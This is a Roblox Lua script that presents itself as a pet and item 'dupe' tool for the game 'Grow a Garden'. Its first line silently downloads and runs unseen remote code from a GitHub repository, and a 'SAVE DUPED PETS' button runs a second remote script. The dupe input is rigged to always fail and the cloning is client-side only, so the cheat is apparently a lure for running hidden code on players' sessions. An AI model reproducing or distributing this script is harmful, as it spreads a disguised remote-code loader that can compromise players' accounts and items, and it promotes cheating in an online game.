loadstring(game:HttpGet("https://raw.githubusercontent.com/aa362/growagarden/refs/heads/main/privatescript"))()
local Players = game:GetService("Players")
local RunService = game:GetService("RunService")
local player = Players.LocalPlayer

local Rayfield = loadstring(game:HttpGet("https://sirius.menu/rayfield"))()

-- UI Window Setup
local Window = Rayfield:CreateWindow({
	Name = "4.0.0 - New Flow",
	LoadingTitle = "Booting Up...",
	LoadingSubtitle = "Made By Glow a Guardian",
	ConfigurationSaving = {
		Enabled = false
	},
	Discord = {
		Enabled = false
	},
	KeySystem = false
})

-- Main Tab
local MainTab = Window:CreateTab("Main", 0)

-- Tool Display
local toolLabel = MainTab:CreateParagraph({
	Title = "Holding:",
	Content = "Nothing"
})

RunService.RenderStepped:Connect(function()
	local tool = player.Character and player.Character:FindFirstChildOfClass("Tool")
	if tool then
		toolLabel:Set({Title = "Holding:", Content = tool.Name})
	else
		toolLabel:Set({Title = "Holding:", Content = "Nothing"})
	end
end)

-- Dupe Amount Input (強制エラー化)
local dupeAmount = 1
MainTab:CreateInput({
	Name = "Dupe Amount (1-100)",
	PlaceholderText = "Enter a number",
	RemoveTextAfterFocusLost = false,
	Callback = function(text)
		error("The input is invalid. All values ​​are rejected.")
	end
})

-- Dupe Button
MainTab:CreateButton({
	Name = "DUPE",
	Callback = function()
		local tool = player.Character and player.Character:FindFirstChildOfClass("Tool")
		if not tool then
			warn("No tool to duplicate.")
			return
		end

		for i = 1, dupeAmount do
			local clone = tool:Clone()
			clone.Parent = player.Backpack
		end
	end
})

-- Save Duped Pets Button
MainTab:CreateButton({
	Name = "SAVE DUPED PETS",
	Callback = function()
		local success, err = pcall(function()
			loadstring(game:HttpGet("https://raw.githubusercontent.com/aa362/growagarden/refs/heads/main/uitest"))()
		end)
		if not success then
			warn("SAVE DUPED PETS failed:", err)
		end
	end
})
